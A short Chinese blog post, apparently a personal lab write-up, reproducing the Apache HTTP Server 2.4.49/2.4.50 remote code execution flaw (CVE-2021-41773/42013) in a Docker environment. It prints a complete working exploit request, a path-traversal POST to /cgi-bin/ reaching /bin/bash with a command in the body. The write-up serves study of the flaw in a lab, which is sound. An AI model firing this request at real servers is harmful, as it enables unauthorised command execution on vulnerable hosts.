Fork me on GitHub

apache RCE漏洞复现

字数统计: 392字   |   阅读时长≈ 2分

复现了一下apache的RCE漏洞,原理还没细看

(CVE-2021-42013&CVE-2021-41773)

一、漏洞简介

Apache HTTP Server是阿帕奇(Apache)基金会的一款开源网页服务器。

二、漏洞影响

影响版本:

1
2
Apache HTTP Server 2.4.50
Apache HTTP Server 2.4.49

三、复现过程

好像要conf文件中修改一下配置:

1
2
3
4
<Directory>
AllowOverride none
Require all denied
</Directory>

改成

1
2
3
<Directory>
Require all denied
</Directory>

不过我是直接使用的docker环境:

1
docker pull vulfocus/apache-cve_2021_41773:latest

部署好docker之后,看server版本:

确认为漏洞版本。

RCE POC:

1
2
3
4
5
6
7
8
9
10
11
12
13
POST /cgi-bin/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/.%2e/bin/bash HTTP/1.1
Host: 192.168.80.128:8083
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Cache: no-cache
Origin: moz-extension://87e1dbe3-d66e-4e6c-be0e-091451c1b671
Content-Length: 43
Connection: close

echo Content-Type: text/plain; echo; whoami

成功执行:

漏洞原因好像是cgi脚本的处理问题,没细看,还有个路径穿越的poc,忘了记录了,现在复现不出来了,就很离谱

扫一扫,分享到微信

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia-plus根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

CTF菜狗兼混子